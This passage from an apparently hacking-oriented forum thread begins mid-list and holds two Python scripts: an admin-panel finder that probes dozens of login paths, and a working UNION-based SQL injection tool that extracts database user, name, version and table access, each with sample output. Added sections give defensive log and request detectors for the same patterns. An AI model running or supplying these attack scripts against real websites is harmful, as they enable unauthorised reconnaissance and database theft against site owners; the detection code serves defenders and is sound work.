gadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin
4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

def header() :
print "\n--== Finder Admin ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

header()

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web,path):
nave = httplib.HTTPConnection(web)
nave.request("GET","/"+path)
return nave.getresponse().status

def buscar(web):
print "\n[+] Target : ",web,"\n\n"
for path in panels:
 try:
  code = toma(web,path)
  if code ==200:
   print "[Link] : "+web+"/"+path
 except(KeyboardInterrupt):
  copyright()
 except:
  pass

if len(sys.argv) != 2 :
show()

else:
buscar(sys.argv[1])

copyright()


#The End


A usage example would be


python finder.py 127.0.0.1



--== Finder Admin ==--


[+] Target :  127.0.0.1


[Link] : 127.0.0.1/admin/
[Link] : 127.0.0.1/login.php
[Link] : 127.0.0.1/phpmyadmin/


(C) Doddy Hackman 2010


Just don't use http:// in the site you want to scan, for example www.google.com.ar
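For the defender's side of the panel finder above, here is an added example (written for this edit, not code from the post or from Doddy Hackman) that scans web server access logs for the trace this kind of tool leaves: one client requesting many distinct admin-looking paths in quick succession and collecting mostly 404s. The log lines and IPs are constructed samples, and the admin path patterns are a short subset of the list in the script.

```python
import re
from collections import defaultdict

# Constructed sample of combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Oct/2011:01:33:01 -0300] "GET /admin/ HTTP/1.1" 404 162 "-" "Python-urllib/2.7"
203.0.113.5 - - [07/Oct/2011:01:33:01 -0300] "GET /admin/login.asp HTTP/1.1" 404 162 "-" "Python-urllib/2.7"
203.0.113.5 - - [07/Oct/2011:01:33:02 -0300] "GET /login.php HTTP/1.1" 200 1045 "-" "Python-urllib/2.7"
203.0.113.5 - - [07/Oct/2011:01:33:02 -0300] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "Python-urllib/2.7"
203.0.113.5 - - [07/Oct/2011:01:33:03 -0300] "GET /wp-admin/ HTTP/1.1" 404 162 "-" "Python-urllib/2.7"
203.0.113.5 - - [07/Oct/2011:01:33:03 -0300] "GET /administrator/ HTTP/1.1" 404 162 "-" "Python-urllib/2.7"
198.51.100.9 - - [07/Oct/2011:01:34:10 -0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Oct/2011:01:34:12 -0300] "GET /login.php HTTP/1.1" 200 1045 "-" "Mozilla/5.0"
"""

# client, timestamp, request line and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path components that ordinary visitors rarely request (subset of the script's list).
ADMIN_PATH_RE = re.compile(
    r'(^|/)(admin|administrator|administracion|phpmyadmin|wp-admin|cpanel|login|webmaster)([./]|$)',
    re.I,
)


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_panel_enumeration(log_text, min_distinct_paths=4, min_404_ratio=0.5):
    """Return {ip: (distinct_admin_paths, not_found_count)} for clients that hit
    at least min_distinct_paths distinct admin-like paths and got 404 on at
    least min_404_ratio of those requests. Ordinary admins use one or two
    panel URLs that exist; enumeration touches many that do not."""
    per_ip = defaultdict(lambda: {"paths": set(), "total": 0, "nf": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not ADMIN_PATH_RE.search(rec["path"]):
            continue
        s = per_ip[rec["ip"]]
        s["paths"].add(rec["path"].lower())
        s["total"] += 1
        if rec["status"] == 404:
            s["nf"] += 1
    flagged = {}
    for ip, s in per_ip.items():
        if len(s["paths"]) >= min_distinct_paths and s["nf"] / s["total"] >= min_404_ratio:
            flagged[ip] = (len(s["paths"]), s["nf"])
    return flagged


if __name__ == "__main__":
    for ip, (paths, nf) in find_panel_enumeration(SAMPLE_LOG).items():
        print("%s requested %d distinct admin paths, %d returned 404" % (ip, paths, nf))
```

The thresholds are deliberately conservative; in a real deployment they would be tuned per site and combined with a time window, and the User-Agent field (the script above sends Python's default) is a second, weaker signal.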

#405
Scripting / [Python] Easy Inyector By Doddy H
7 October 2011, 01:33 AM
Well, this is the first version of this simple program that I wrote in Perl; in the
next version I will add other things and it will be able to scan several sites from a text file.

This thing looks for:

* Vulnerability (obviously)
* Column limit
* Information about the database
* Automatically finds the number that allows information to be displayed
* Checks for the existence of mysql.user and information.schema.tables

Code (python):

#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010

import os,sys,urllib2,re


def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")


def header() :
print "\n--== Easy Inyector ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def bypass(bypass):
if bypass == "--":
 return("+","--")
elif bypass == "/*":
 return("/**/","/*")
else:
 return("+","--")

def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
code0 = toma(web1)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
 datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
 datar = re.split("K0BRA",datax[0])
 print "[+] Username :",datar[1]
 print "[+] Database :",datar[2]
 print "[+] Version :",datar[3],"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
  print "[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
  print "[+] information_schema.tables : on"

def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "concat(0x4b30425241,1,0x4b30425241)"
for te in range(2,30):
 number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code)
  print "[+] Column length :",te
  print "[+] Numbers",numbers,"print data"
  sql = ""
  tex = te + 1
  for sqlix in range(2,tex):
   sql = str(sql)+","+str(sqlix)
   sqli  = str(1)+sql
  sqla = re.sub(numbers[0],"hackman",sqli)
  more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  print "\n[+] Scan Finished\n"
  sys.exit(1)
print "[-] Length dont found\n"
 
   
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
 print "[+] SQLI Detected"
 findlength(web,passx)
else:
 print "[-] Not Vulnerable"
 copyright()


header()

if len(sys.argv) != 2 :
show()

else :
try:
 scan(sys.argv[1],"--")
except:
 copyright()


#The End




Usage example



C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010
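From the detection side, here is an added example (my own code, not part of the post) that flags the request shapes the injector above sends (a UNION SELECT appended to a numeric parameter, the concat(0x...) markers, and the trailing -- or /* comment) and checks whether a response body leaks the MySQL column-count error the script uses as its oracle. The sample URLs and response bodies are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Request-side patterns. The injector above separates keywords with "+" (a
# space once URL-decoded) or with "/**/" comments, so both are normalised first.
UNION_RE = re.compile(r'\bunion\s+(all\s+)?select\b', re.I)
HEX_CONCAT_RE = re.compile(r'\bconcat\s*\(\s*0x[0-9a-f]+', re.I)
TRAILING_COMMENT_RE = re.compile(r'(--|/\*)\s*$')

# Response-side marker: if this text reaches a client, the application is
# echoing database errors verbatim, which is what makes the probe above work.
MYSQL_COLUMN_ERROR = "The used SELECT statements have a different number of columns"


def normalise(value):
    """Decode once more (parse_qsl already decoded once) so double-encoded
    payloads are caught, then strip inline comments and collapse whitespace."""
    v = unquote_plus(value)
    v = re.sub(r'/\*.*?\*/', ' ', v)
    return re.sub(r'\s+', ' ', v).strip()


def classify_request(url):
    """Return [(param_name, [indicator, ...]), ...] for every query parameter
    whose value looks like UNION-based SQL probing; [] for a clean request."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = normalise(raw)
        hits = []
        if UNION_RE.search(v):
            hits.append("union-select")
        if HEX_CONCAT_RE.search(v):
            hits.append("hex-concat-marker")
        if TRAILING_COMMENT_RE.search(v):
            hits.append("trailing-comment")
        if hits:
            findings.append((name, hits))
    return findings


def response_leaks_sql_error(body):
    """True when a response body contains the MySQL column-count error text."""
    return MYSQL_COLUMN_ERROR.lower() in body.lower()


if __name__ == "__main__":
    # Constructed sample requests and responses, not captured traffic.
    for u in ("http://127.0.0.1/sql.php?id=5",
              "http://127.0.0.1/sql.php?id=-1+union+select+1--",
              "http://127.0.0.1/sql.php?id=-1/**/union/**/select/**/1/*"):
        print(u, "->", classify_request(u) or "clean")
    print(response_leaks_sql_error("<b>Warning</b>: " + MYSQL_COLUMN_ERROR))
```

The response-side check is the more useful one for remediation: a positive result means the application builds SQL from the raw id parameter and surfaces the driver's error text, so the fix is a parameterised query plus generic error pages, not a filter on the request patterns.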